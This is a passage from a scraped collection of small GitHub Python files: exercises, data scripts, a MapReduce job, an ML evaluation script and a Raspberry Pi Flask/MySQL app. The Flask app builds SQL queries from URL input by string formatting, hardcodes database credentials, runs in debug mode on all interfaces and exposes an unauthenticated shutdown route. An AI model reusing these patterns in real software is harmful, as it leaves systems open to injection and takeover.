pass\n","repo_name":"Chaclie/BaiduPaddleAI","sub_path":"Chapter1_PythonBasic/Lab3_FigureStatistics/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
+{"seq_id":"29738387900","text":"\"\"\"\n @Time    : 2018-10-28 00:09\n @Author  : TaylorMei\n @Email   : mhy845879017@gmail.com\n \n @Project : Mirror-Segmentation\n @File    : edge.py\n @Function: \n \n\"\"\"\n\nimport os\nimport numpy as np\nimport cv2\nfrom PIL import Image\n\n# DATA_DIR = \"/home/iccd/Mirror-Segmentation/data_640/val\"\nDATA_DIR = \"/root/data_640/train\"\nIMAGE_DIR = os.path.join(DATA_DIR, \"image\")\n\nimglist = os.listdir(IMAGE_DIR)\nprint(\"Edges will be extracted from {} masks in total!\".format(len(imglist)))\n\nq = 0\nfor imgname in imglist:\n    q += 1\n    mask_path = DATA_DIR + \"/mask/\" + imgname[:-4] + \"_json/label8.png\"\n    edge_path = DATA_DIR + \"/mask/\" + imgname[:-4] + \"_json/edge.png\"\n\n    mask = Image.open(mask_path)\n    num_obj = np.max(mask)\n\n    width, height = mask.size\n    gt_mask = np.zeros([height, width, 1], dtype=np.uint8)\n    for index in range(num_obj):\n        for i in range(width):\n            for j in range(height):\n                at_pixel = mask.getpixel((i, j))\n                if at_pixel == index + 1:\n                    gt_mask[j, i, 0] = 255\n\n    edge = cv2.Canny(gt_mask, 0, 255)\n    edge = np.where(edge != 0, 255, 0).astype(np.uint8)\n\n    cv2.imwrite(edge_path, edge)\n    print(\"{} {}\".format(q, edge_path))\n","repo_name":"Mhaiyang/Mirror-Segmentation","sub_path":"tools/edge.py","file_name":"edge.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"83"}
+{"seq_id":"22034889719","text":"from 
LinkedLists import Link\n\n# Question 1\n# link = Link(1000)\n# print(link.first)\n# print(link.rest is Link.empty)\n# link = Link(1000, 2000)\n# # link = Link(1000, Link()) -> error\n# link = Link(1, Link(2, Link(3)))\n# print(link.first)\n# print(link.rest.first)\n# print(link.rest.rest.rest is Link.empty)\n# link.first = 9001\n# print(link.first)\n# link.rest = link.rest.rest\n# print(link.rest.first)\n# link = Link(1)\n# link.rest = link\n# print(link.rest.rest.rest.rest.first)\n\n\n# Question 2\n\ndef insert_front(linked_list, new_val):\n    \"\"\"Inserts NEW_VAL in front of LINKED_LIST, returning new linked list.\"\"\"\n    return Link(new_val, linked_list)\n\n\ndef reverse_link(lnk):\n    # Walk the list once, pushing each value onto the front of the result.\n    # (An earlier version pushed whole Link nodes instead of their values\n    # and dropped the last element.)\n    ret_list = Link.empty\n    while lnk is not Link.empty:\n        ret_list = insert_front(ret_list, lnk.first)\n        lnk = lnk.rest\n    return ret_list\n\n\ns = Link(1, Link(2, Link(3, Link.empty)))\nprint(\"Returned list is \" + str(reverse_link(s)))\n","repo_name":"LakshyaShrivastava/LearningPython","sub_path":"oldLectureAssignments/Lab7.py","file_name":"Lab7.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
+{"seq_id":"2966009730","text":"import feedparser\n\ndef news(rss):\n\tNewsFeed = feedparser.parse(rss)\n\tNewsFeed = NewsFeed.entries\n\ta = NewsFeed[0]\n\ttitle = a.title\n\tsummary = a.summary\n\tlink = a.link\n\tpub = a.published\n\tn = \"======---->>>>>>>>><<<<<<<<<<----========\"\n\tnews = (title, link)\n\treturn str(news)\n","repo_name":"moein805/News_telebot","sub_path":"feed.py","file_name":"feed.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
+{"seq_id":"10819916566","text":"# Great discussion about shoving metadata into people's faces:\n# https://stackoverflow.com/questions/1523427/what-is-the-common-header-format-of-python-files\n\n# FIT2085 requires two main elements to be present before import statements\n# \"\"\"Docstring module as an overview of the file\"\"\"\n# __author__ variable that indicates the author\n\n# https://docs.python.org/3/library/typing.html#typing.TypeVar\n# Can't really find comprehensive information on TypeVar\n\nfrom typing import TypeVar\n\nT = TypeVar(\"T\", int, str)\n\n\ndef get_element(x: int, y: int):\n    a = [0, 1, 2, 0, 1, 2, 0, 1, 2]\n    b = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]\n    c = \"Almost done!\"\n    d = [a, b, c]\n\n    return d[x][y]\n\n\nprint(\"get_element(0, 4): \" + str(get_element(0, 4)))\nprint(\"get_element(1, 9): \" + str(get_element(1, 9)))\nprint(\"get_element(2, -1): \" + str(get_element(2, -1)))\n","repo_name":"randcyp/FIT2085","sub_path":"Tutorial 1/Exercise 5.py","file_name":"Exercise 5.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
+{"seq_id":"17591706347","text":"functions = [\"plain\", \"bold\", \"italic\", \"header\", \"link\", \"inline-code\", \"new-line\", \"ordered-list\", \"unordered-list\"]\ncommands = [\"!help\", \"!done\"]\noutput = []\n\nwhile True:\n    while True:\n        command = input(\"Choose a formatter: \")\n        if command in (*functions, *commands):\n            break\n        else:\n            print(\"Unknown formatting type or command\")\n    if command == \"!help\":\n        print(f\"Available formatters: {' '.join(functions)}\")\n        print(f\"Special commands: {' '.join(commands)}\")\n    elif command == \"!done\":\n        
break\n elif command == \"header\":\n while True:\n header_level = int(input(\"Level: \"))\n if header_level not in range(1, 7):\n print(\"The level should be within the range of 1 to 6\")\n else:\n break\n text = input(\"Text: \")\n output.append(\"#\" * header_level + \" \" + text + \"\\n\")\n elif command in (\"plain\", \"bold\", \"italic\", \"inline-code\"):\n text = input(\"Text: \")\n if command == \"plain\":\n output.append(text)\n elif command == \"bold\":\n output.append(\"**\" + text + \"**\")\n elif command == \"italic\":\n output.append(\"*\" + text + \"*\")\n else:\n output.append(\"`\" + text + \"`\")\n elif command == \"new-line\":\n output.append(\"\\n\")\n elif command == \"link\":\n label = input(\"Label: \")\n link = input(\"URL: \")\n output.append(f\"[{label}]({link})\")\n elif command in (\"ordered-list\", \"unordered-list\"):\n while True:\n rows = int(input(\"Number of rows: \"))\n if rows > 0:\n break\n print(\"The number of rows should be greater than zero\")\n output.extend([f\"{index}. {input(f'Row #{index}: ') }\\n\"\n if command == \"ordered-list\" else f\"* {input(f'Row #{index}: ')}\\n\"\n for index in range(1, rows + 1)])\n print(\"\".join(output))\n\nwith open(\"output.md\", \"wt\") as file:\n file.write(\"\".join(output))\n","repo_name":"BigIron01/learning_python","sub_path":"markdown_generator.py","file_name":"markdown_generator.py","file_ext":"py","file_size_in_byte":2033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"18651265236","text":"from string import ascii_lowercase\n\n\ndef mix(s1, s2):\n c1 = [s1.count(ascii_lowercase[i]) for i in range(0, 26)]\n c2 = [s2.count(ascii_lowercase[i]) for i in range(0, 26)]\n m = [max(c1[i], c2[i]) for i in range(0,26)]\n strings = []\n for i in range(0, 26):\n if m[i] > 1:\n prefix = [\"2\", \"1\"][m[i] == c1[i]]\n prefix = [prefix, \"=\"][c1[i] == c2[i]]\n strings.append(prefix + \":\" + ascii_lowercase[i] * m[i])\n\n return \"/\".join(sorted(strings, key = lambda x : (-len(x), x)))\n\n\nif __name__ == \"__main__\":\n assert mix(\"Are they here\", \"yes, they are here\") == \"2:eeeee/2:yy/=:hh/=:rr\"\n assert mix(\"looping is fun but dangerous\", \"less dangerous than coding\") == \\\n \"1:ooo/1:uuu/2:sss/=:nnn/1:ii/2:aa/2:dd/2:ee/=:gg\"\n assert mix(\" In many languages\", \" there's a pair of functions\") == \\\n \"1:aaa/1:nnn/1:gg/2:ee/2:ff/2:ii/2:oo/2:rr/2:ss/2:tt\"\n assert mix(\"Lords of the Fallen\", \"gamekult\") == \"1:ee/1:ll/1:oo\"\n assert mix(\"codewars\", \"codewars\") == \"\"\n assert mix(\"A generation must confront the looming \", \"codewarrs\") == \\\n \"1:nnnnn/1:ooooo/1:tttt/1:eee/1:gg/1:ii/1:mm/=:rr\"\n","repo_name":"ladamalina/codewars-2019-python","sub_path":"Strings Mix/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"28041094902","text":"class HistoricalData:\n def __init__(self, id, symbolid, opendate, opener, closer,\n high, low, volume, uopener, ucloser, uhigh, ulow,\n uvolume, change, changepercent, label, createdon):\n self.id = id\n self.symbolid = symbolid\n self.opendate = opendate\n self.opener = opener\n self.closer = closer\n self.high = high\n self.low = low\n self.volume = volume\n self.uopener = uopener\n self.ucloser = ucloser\n self.uhigh = uhigh\n self.ulow = ulow\n self.uvolume = uvolume\n self.change = change\n self.changepercent = changepercent\n self.label = label\n 
self.createdon = createdon\n\n def __enter__(self):\n return self\n\n def createcommadelimitedvalueforinsert(self):\n retVal = \"\"\n retVal += \"'\" + self.symbolid + \"'\"\n retVal += \", '\" + self.opendate + \"'\"\n retVal += \",'\" + self.opener + \"'\"\n retVal += \",'\" + self.closer + \"'\"\n retVal += \",'\" + self.high + \"'\"\n retVal += \",'\" + self.low + \"'\"\n retVal += \",'\" + self.volume + \"'\"\n retVal += \",'\" + self.uopener + \"'\"\n retVal += \",'\" + self.ucloser + \"'\"\n retVal += \",'\" + self.uhigh + \"'\"\n retVal += \",'\" + self.ulow + \"'\"\n retVal += \",'\" + self.uvolume + \"'\"\n retVal += \",'\" + self.change + \"'\"\n retVal += \",'\" + self.changepercent + \"'\"\n retVal += \",\" + str(self.label) + \"\"\n retVal += \",'\" + self.createdon + \"'\"\n return retVal","repo_name":"persinac/stock_iex","sub_path":"classes/HistoricalData.py","file_name":"HistoricalData.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"32325643355","text":"# coding: utf-8\n\nimport MySQLdb\nfrom flask import Flask\nfrom flask import render_template\nfrom flask import request\nimport RPi.GPIO as GPIO\n\napp = Flask(__name__)\nGPIO.setmode(GPIO.BCM)\nleds = {\n 24 : {'name' : 'LED', 'state' : GPIO.LOW}\n}\n\nfor led in leds :\n GPIO.setup(led, GPIO.OUT)\n GPIO.output(led, GPIO.LOW)\n\ndef getGpioState():\n for led in leds :\n leds[led]['state'] = GPIO.input(led)\n return leds\n \ndef shutdown_server():\n func = request.environ.get('werkzeug.server.shutdown')\n if func is None:\n raise RuntimeError('Not running with the Werkzeug Server')\n func()\n\n@app.route('/shutdown') #http://192.168.1.111:8888/shutdown\ndef shutdown():\n shutdown_server()\n return 'Server shutting down..'\n\n@app.route('/insert')\ndef hello1():\n db=MySQLdb.connect(\"localhost\", \"root\", \"1234\", \"SCOTT\")\n cur = db.cursor()\n try:\n cur.execute(\"insert into EMP(empno,ename)value(333,'ddd')\")\n db.commit()\n return 'db data input oo'\n except:\n db.rollback()\n return 'db data nono'\n \n cur.close()\n db.close()\n@app.route('/delete')\ndef hello2():\n db=MySQLdb.connect(\"localhost\", \"root\", \"1234\", \"SCOTT\")\n cur = db.cursor()\n try:\n cur.execute(\"delete from EMP where empno=333\")\n db.commit()\n return 'db data delete oo'\n except:\n db.rollback()\n return 'db data delete nono'\n \n cur.close()\n db.close()\n@app.route('/create')\ndef hello3():\n db=MySQLdb.connect(\"localhost\", \"root\", \"1234\", \"SCOTT\")\n cur = db.cursor()\n try:\n cur.execute(\"create table KKAA(id int ,name char(20))\")\n cur.execute(\"insert into KKAA(id,name)value(1,'ddd')\")\n db.commit()\n return 'db data create oo'\n except:\n db.rollback()\n return 'db data create nono'\n \n cur.close()\n db.close()\n@app.route('/cre') #http://192.168.1.111:8888\ndef hello4():\n db = MySQLdb.connect(\"localhost\", \"root\", \"1234\", \"SCOTT\")\n cur = db.cursor()\n cur.execute(\"select * from KKAA\")\n row = cur.fetchall()\n\n templateData = {'data' : row} #row는 2차원 배열\n return render_template('test.html', **templateData)\n\n cur.close()\n db.close()\n\n \n@app.route('/') #http://192.168.1.111:8888\ndef hello():\n db = MySQLdb.connect(\"localhost\", \"root\", \"1234\", \"SCOTT\")\n cur = db.cursor()\n cur.execute(\"select empno, ename from EMP\")\n row = cur.fetchall()\n\n templateData = {'data' : row} #row는 2차원 배열\n #{'data':row{'empno' : value , 'ename' : value}}\n return render_template('test.html', 
**templateData)\n\n cur.close()\n db.close()\n \n@app.route('/select') #http://192.168.1.111:8888\ndef hello5():\n db = MySQLdb.connect(\"localhost\", \"root\", \"1234\", \"SCOTT\")\n cur = db.cursor()\n cur.execute(\"select * from EMP\")\n row = cur.fetchall()\n\n templateData = {'data' : row} #row는 2차원 배열\n #{'data':row{'empno' : value , 'ename' : value}}\n return render_template('test.html', **templateData)\n\n cur.close()\n db.close()\n@app.route('/select/') #http://192.168.1.111:8888\ndef hello6(num):\n db = MySQLdb.connect(\"localhost\", \"root\", \"1234\", \"SCOTT\")\n cur = db.cursor()\n cur.execute(\"select * from EMP where empno=%s\"%num)\n row = cur.fetchall()\n\n templateData = {'data' : row} #row는 2차원 배열\n #{'data':row{'empno' : value , 'ename' : value}}\n return render_template('test.html', **templateData)\n\n cur.close()\n db.close()\n@app.route(\"/led/on\")\ndef hello7():\n try:\n GPIO.output(24, GPIO.HIGH)\n return 'led on'\n except:\n return 'nononono'\n@app.route(\"/led/off\")\ndef hello8():\n try:\n GPIO.output(24, GPIO.LOW)\n return 'led off'\n except:\n return 'nononono'\n\n\n\n \nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=8887, debug=True)\n\n\n\n\n\n\n\n","repo_name":"pensirara/github","sub_path":"webapp/MySQLdb_flask/mysqlflask3/mysqlflask3.py","file_name":"mysqlflask3.py","file_ext":"py","file_size_in_byte":4323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"73218776270","text":"import math\n\n@staticmethod\ndef eratosthenes_sieve(N):\n\tprimes = []\n\n\tA = [True] * (N+1)\n\tsqrtN = math.floor( math.sqrt(N) )\n\n\tfor i in range(2, sqrtN + 1):\n\t\tif A[i]:\n\t\t\tj = 0\n\t\t\twhile i*i+j*i <= N:\n\t\t\t\tA[i*i+j*i] = False\n\t\t\t\tj = j + 1\n\n\tfor i in range(2,N+1):\n\t\tif A[i]:\n\t\t\tprimes.append(i)\n\n\treturn primes\n\nif __name__ == '__main__':\n\tresult = eratosthenes_sieve(100)\n\tprint(result)","repo_name":"jevanson/NumberSieves","sub_path":"EratosthenesSieve.py","file_name":"EratosthenesSieve.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"24596361601","text":"from mrjob.job import MRJob as mrj\nimport json\nfrom scipy.spatial import ConvexHull\nimport heapq\n\n\nclass make_graph(mrj):\n '''\n construct vectors of containing relevant variables for every location\n '''\n\n def configure_options(self):\n '''\n pass additional arg to map reduce job\n '''\n super(make_graph,self).configure_options()\n self.add_file_option('--n')\n\n def mapper(self,_,line):\n \"\"\"\n takes in a line, seperate centre of homeogenous area\n from all the nodes, then makes hull of points to proxy for area\n \"\"\"\n line = line.strip('\\tnull\\n').replace('\"','')\n centre, nodes = line.split('|')\n\n cname, clon, clat = centre.split(',')\n\n points = []\n for n in nodes.split(';'):\n if n == '':\n continue\n nname, nlon, nlat = n.split(',')\n points.append((nlon,nlat))\n\n hull = ConvexHull(points)\n area = hull.volume\n yield cname, area\n\n def reducer_init(self):\n \"\"\"\n find top n with a heap\n \"\"\"\n self.n = int(self.options.n)\n self.h = []\n for i in range(self.n):\n self.h.append((-99999999999,-9999999999))\n heapq.heapify(self.h)\n\n def reducer(self, place, area):\n \"\"\"\n find top n with a heap\n \"\"\"\n min_count, min_n = self.h[0]\n\n l = list(area)\n assert len(l)==1\n area = l[0]\n\n if area > min_count:\n heapq.heapreplace(self.h, (area, place))\n\n def 
reducer_final(self):\n '''\n sorts and yields the heap self.h\n '''\n self.h.sort(reverse=True)\n for (area,place) in self.h:\n yield place, abs(area)\n\n\nif __name__ == \"__main__\":\n make_graph.run()\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"smahaffie/123project","sub_path":"analyzers/surfacearea.py","file_name":"surfacearea.py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"18768871951","text":"from flask import Flask\n\n\ndef create_app() -> Flask:\n # Define Flask Application as app.\n app = Flask(__name__)\n \n # Load Configurations\n app.config['ENV'] = 'development'\n app.config['DEBUG'] = False\n app.config['TESTING'] = False\n\n # Initialize Blueprints\n initialize_blueprints(app)\n\n # Log Application Mode.\n print(\n f\"Application running in {app.config['ENV']} mode\"\n )\n # Return and start Flask application.\n return app\n\n\ndef initialize_blueprints(app: object) -> None:\n # Base Blueprints\n from base import (\n base_bp\n )\n app.register_blueprint(\n base_bp\n )\n # Recipe Blueprints\n from recipes import (\n recipes_bp\n )\n app.register_blueprint(\n recipes_bp\n )\n # System Blueprints\n from system import (\n system_bp\n )\n app.register_blueprint(\n system_bp\n )\n","repo_name":"Myothas/cookbook","sub_path":"src/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"28891748141","text":"from numpy import log, exp, allclose, sqrt\nimport numpy as np\n\nfrom os.path import dirname, realpath, join\n\nfrom arspy.ars import adaptive_rejection_sampling\n\n\ndata_file = \"{}/ars_{{}}.npy\".format(\n join(dirname(realpath(__file__)), \"reference_data\", \"ars_data\")\n).format\n\n\ndef gaussian(x, sigma=1):\n return log(exp(-x ** 2 / sigma))\n\n\ndef half_gaussian(x, sigma=3):\n return log(exp(-x ** 2 / sigma)) * (1 * (x <= 0) + 1e300 * (x > 0))\n\n\ndef relativistic_momentum_logpdf(p, m=1., c=1.):\n return -m * c ** 2 * sqrt(p ** 2 / (m ** 2 * c ** 2) + 1)\n\n\ntests = {\n \"1d-gaussian\": {\"name\": \"1d-gaussian\",\n \"data\": data_file(\"gaussian\"),\n \"func\": gaussian,\n \"a\": -2, \"b\": 2,\n \"domain\": (float(\"-inf\"), float(\"inf\")),\n \"n_samples\": 20},\n \"1d-half-gaussian\": {\"name\": \"1d-half-gaussian\",\n \"data\": data_file(\"half_gaussian\"),\n \"func\": half_gaussian,\n \"a\": -2, \"b\": 0,\n \"domain\": [float(\"-inf\"), 0],\n \"n_samples\": 20},\n \"relativistic_monte_carlo_logpdf\": {\n \"name\": \"relativistic_momentum_logpdf\",\n \"data\": data_file(\"relativistic_logpdf\"),\n \"func\": relativistic_momentum_logpdf,\n \"a\": -10.0, \"b\": 10.0,\n \"domain\": [float(\"-inf\"), float(\"inf\")],\n \"n_samples\": 20\n }\n\n}\n\n\ndef _run(test_name):\n input_dict = tests[test_name]\n\n # name = input_dict[\"name\"]\n a = input_dict[\"a\"]\n b = input_dict[\"b\"]\n domain = input_dict[\"domain\"]\n n_samples = input_dict[\"n_samples\"]\n\n logpdf = input_dict[\"func\"]\n\n python_result = adaptive_rejection_sampling(\n logpdf=logpdf, a=a, b=b, domain=domain, n_samples=n_samples,\n random_stream=np.random.RandomState(seed=1)\n )\n\n # load old result computed by other implementation (julia)\n julia_result = np.load(input_dict[\"data\"])\n\n assert(allclose(julia_result, python_result, atol=3e-01))\n\n\ndef test_gaussian():\n _run(\"1d-gaussian\")\n\n\ndef test_half_gaussian():\n 
_run(\"1d-half-gaussian\")\n\n\ndef test_relativistic_monte_carlo_logpdf():\n _run(\"relativistic_monte_carlo_logpdf\")\n","repo_name":"MFreidank/ARSpy","sub_path":"arspy/tests/test_ars.py","file_name":"test_ars.py","file_ext":"py","file_size_in_byte":2228,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"83"} +{"seq_id":"13939216358","text":"import json\nimport tensorflow as tf\nfrom tqdm import tqdm\nimport os\n\nimport sys\nsys.path.append(\".\")\n\nfrom data.data_reddit import REDDIT\nfrom modules.vaeseq import VAESEQ\nfrom config import args\nfrom measures import evaluation_utils\n\ndef main():\n ## CUDA\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = str(args.cuda)\n\n ## Parameters\n if args.exp == \"NONE\":\n args.exp = args.graph_type\n \n exp_path = \"./saved/\"+args.exp+\"/\"\n args.data_len = 20000\n print(args)\n\n ## DataLoader\n dataloader = REDDIT(batch_size=args.batch_size, vocab_limit=args.vocab_limit, max_input_len=args.enc_max_len, max_output_len=args.dec_max_len)\n params = {\n 'vocab_size': len(dataloader.word2idx),\n 'word2idx': dataloader.word2idx,\n 'idx2word': dataloader.idx2word,\n 'loss_type': args.loss_type,\n 'graph_type': args.graph_type}\n print('Vocab Size:', params['vocab_size'])\n\n ## ModelInit \n model = VAESEQ(params)\n\n ## Session\n # load some parameters\n variables = tf.contrib.framework.get_variables_to_restore()\n print(len(variables), end=\",\")\n variables = [v for v in variables if \"optimizer\" not in v.name]\n # for v in variables_to_resotre:\n # print(type(v.name), v.name)\n print(len(variables))\n # end load\n saver = tf.train.Saver(variables)\n # saver = tf.train.Saver()\n config = tf.ConfigProto(allow_soft_placement=True)\n config.gpu_options.allow_growth=True\n with tf.Session(config=config) as sess:\n sess.run(tf.global_variables_initializer())\n\n restore_path = tf.train.latest_checkpoint(exp_path)\n saver.restore(sess, restore_path)\n saver = tf.train.Saver() # new saver\n print(\"Model restore from file: %s\" % (restore_path))\n \n # Parpear Dir\n ref_file = exp_path+\"test.input.txt\"\n trans_file = exp_path+\"test.output.txt\"\n result_file = exp_path+\"test.\"+restore_path.split(\"-\")[-1]+\".decoder.result.txt\"\n test_file = \"./corpus/reddit/test.txt\"\n\n # Test Dir\n dataloader.trans_in_ref(finpath=test_file, foutpath=ref_file)\n with open(trans_file, \"w\") as f:\n f.write(\"\")\n print(\"[PAEPEAR DATASET]\")\n\n # Test DataSet\n test_len = 20000\n batcher = dataloader.load_data(fpath=test_file)\n for _ in tqdm(range((test_len-1)//args.batch_size+1)):\n try:\n x_enc_inp, _, _, y_enc_inp, _, _ = next(batcher)\n # dec_inp = dataloader.update_word_dropout(dec_inp_full)\n except StopIteration:\n print(\"there are no more examples\")\n break\n # print(\"x_enc_inp:\", x_enc_inp)\n # print(\"y_enc_inp:\", y_enc_inp)\n # model.decoder_model.generate(sess)\n # model.decoder_model.generate(sess)\n # model.decoder_model.generate(sess)\n # model.decoder_model.generate(sess)\n # model.decoder_model.generate(sess)\n print(\"-----------------\")\n model_test = model.decoder_model\n predict_z_one = model_test.point_reconstruct(sess, \"have fun\")\n predict_z_two = model_test.point_reconstruct(sess, \"thank you very much\")\n print(\"-----------------\")\n beta = 0.8\n model_test.generate_byz(sess, beta*predict_z_one+(1-beta)*predict_z_two)\n beta = 0.6\n model_test.generate_byz(sess, beta*predict_z_one+(1-beta)*predict_z_two)\n beta = 0.4\n model_test.generate_byz(sess, 
beta*predict_z_one+(1-beta)*predict_z_two)\n beta = 0.2\n model_test.generate_byz(sess, beta*predict_z_one+(1-beta)*predict_z_two)\n break\n\n\nif __name__ == '__main__':\n print(json.dumps(args.__dict__, indent=4))\n main()","repo_name":"xzhren/VAE2Seq","sub_path":"measures/analyzer_vae.py","file_name":"analyzer_vae.py","file_ext":"py","file_size_in_byte":3802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"41967283923","text":"\"\"\"\n Christina Trotter\n CSCI 533\n 11/29/2017\n\n This file contains the functions used to compress a given file\n\"\"\"\n\nimport bitstring as bs, huff_heap as h\n\nNUMBITS = 8\n\ndef compress(f):\n b,s = encrypt(f), ''\n for l in b:\n s = s + l\n r = len(s) % NUMBITS\n fill_num = NUMBITS - r\n s = s.ljust(len(s) + fill_num,'0')\n bits = bs.BitArray(bin=s)\n byte = bits.tobytes()\n return byte\n\ndef encrypt(f):\n f = f.split('\\n')\n bits = []\n for line in f:\n chars = list(line)\n bits.append(encrypt_helper(chars))\n bits.append(get_special_bits('EOF'))\n\n return bits\n\ndef get_charbits(c):\n if len(h.heap) < 3:\n return ''\n s = ''\n if c in h.heap[1][1]:\n s = bit_helper(h.heap[1],c,'')\n elif c in h.heap[2][1]:\n s = bit_helper(h.heap[2],c,'')\n s = remove_nones(s)\n return s\n\ndef get_special_bits(c):\n a,p,s = 1,0,''\n\n while a is not h.NO_CHILD:\n p = a\n s = s + str(h.heap[a][3])\n a,b = h.get_children(h.heap,h.heap[a])\n\n if c == h.heap[p-1][1]:\n s = s[:-1] + str(h.heap[p-1][3])\n\n return s\n\ndef bit_helper(x,c,s):\n s = s + str(x[3])\n if c == x[1]:\n return s\n if c in x[1]:\n a,b = h.get_children(h.heap,x)\n return bit_helper(h.heap[a],c,s), bit_helper(h.heap[b],c,s)\n return\n\ndef encrypt_helper(ch):\n bit_str = ''\n for c in ch:\n if c.isalpha() or c == ' ':\n bit_str = bit_str + get_charbits(c.upper())\n bit_str = bit_str + get_special_bits('EOL')\n return bit_str\n\ndef remove_nones(x):\n inf = False\n while isinstance(x, tuple) and not inf:\n inf = True\n for y in x:\n if y is not None:\n x = y\n inf = False\n return x\n","repo_name":"ninaaj/Huffman","sub_path":"huff_comp.py","file_name":"huff_comp.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"74207196110","text":"#!/usr/bin/env python\nimport sys\n\n# Initialize variables to store matrix data and the vector\nmatrix_data = {}\nvector = {}\n\n# Reducer function\ndef reducer():\n for line in sys.stdin:\n line = line.strip()\n parts = line.split(',')\n \n if len(parts) == 4:\n row, matrix_id, col, value = parts\n row, col, value = int(row), int(col), int(value)\n \n if matrix_id == 'A':\n if row not in matrix_data:\n matrix_data[row] = {}\n matrix_data[row][col] = value\n elif matrix_id == 'B':\n vector[row] = value\n\n # Perform matrix-vector multiplication and emit the results\n for row, matrix_row in matrix_data.items():\n result = sum(matrix_row[col] * vector[col] for col in matrix_row)\n print('{}\\tA,{},{}'.format(row, row, result))\n\nif __name__ == \"__main__\":\n reducer()\n\n","repo_name":"tankisank/lab","sub_path":"big-data-analytics-lab-main/reducer_2.py","file_name":"reducer_2.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"15756031524","text":"from collections import OrderedDict\n\n\n\"\"\"\nGeneral design.\nI am using a hash table to set the keys and values,\nthen I am using another hash table 
that has all the frequencies as keys and values as\nordered linked lists.\nWhat's the criteria for eliminating new elements?\n1. frequencies, least used will be eleminated first\n2. If there is a tie then recently used keys have higher priority to conserve.\n\"\"\"\n\n\n\n\nclass LFUCache:\n def __init__(self, capacity: int):\n self.cap = capacity\n self.size = 0\n \n # main record key:(value, freq)\n self.keys = {} \n \n # backup record freq:dll\n self.frequencies = OrderedDict()\n \n # Set the first legal frequency, 1.\n self.frequencies[1] = OrderedDict()\n\n \n \n def get(self, key: int) -> int:\n \n if key not in self.keys:\n return -1\n \n item = self.keys[key]\n \n value = item[0]\n freq = item[1]\n self.updateKey(key, value)\n \n\n \n return value\n \n \n \n def put(self, key: int, value: int) -> None:\n if key in self.keys:\n self.updateKey(key, value)\n return\n \n self.size += 1\n \n if self.size > self.cap and self.cap > 0:\n self.popCache()\n elif self.cap == 0:\n return\n \n self.keys[key] = (value, 1)\n \n if 1 not in self.frequencies:\n self.frequencies[1] = OrderedDict()\n \n firstFreqList = self.frequencies[1]\n \n \n \n firstFreqList[key] = (value, 1)\n firstFreqList.move_to_end(key, last=False)\n \n \n \n \n \n # updating my key\n def updateKey(self, key, newValue):\n item = self.keys[key]\n freq = item[1]\n newFreq = freq + 1\n \n self.removeFromDict(freq, key)\n \n if newFreq not in self.frequencies:\n self.frequencies[newFreq] = OrderedDict()\n \n freqList = self.frequencies[newFreq]\n #update the new frequency\n freqList[key] = (newValue, newFreq)\n \n # move to first\n freqList.move_to_end(key, last=False)\n \n # update the main hash\n self.keys[key] = (newValue, newFreq)\n #print(f'{key} should now be in the new freq {newFreq} with a value of {newValue}: {freqList}')\n return\n\n \n # removes the last item in the whole cache\n def popCache(self):\n \n lowFreq = min( _ for _ in self.frequencies.keys())\n \n # get the last item of the list\n item = self.frequencies[lowFreq].popitem()\n key = item[0]\n \n #print(f'Popping {key} from freq {lowFreq}')\n \n # remove the frequency if empty\n if len(self.frequencies[lowFreq]) == 0:\n del self.frequencies[lowFreq]\n \n # remove item from the main dictionary\n del self.keys[key]\n \n self.size -= 1\n return\n \n \n\n # removes an item only from the ordered list it is set to\n def removeFromDict(self, freq, key):\n # remove key from frequency list\n del self.frequencies[freq][key]\n \n # if frequency list is empty we remove it.\n if len(self.frequencies[freq]) == 0:\n del self.frequencies[freq]\n\n\n# Your LFUCache object will be instantiated and called as such:\n# obj = LFUCache(capacity)\n# param_1 = obj.get(key)\n# obj.put(key,value)","repo_name":"AlanFGC/Leetcode-Hero","sub_path":"460-lfu-cache/460-lfu-cache.py","file_name":"460-lfu-cache.py","file_ext":"py","file_size_in_byte":3515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"12298324429","text":"import numpy as np\nimport gurobipy as grb\nfrom gurobipy import GRB\n\n\ndef build_model(data, with_epsilon_constraint=False):\n model = grb.Model()\n\n worker_length = len(data[\"staff\"]) # Number of workers\n job_length = len(data[\"jobs\"]) # Number of 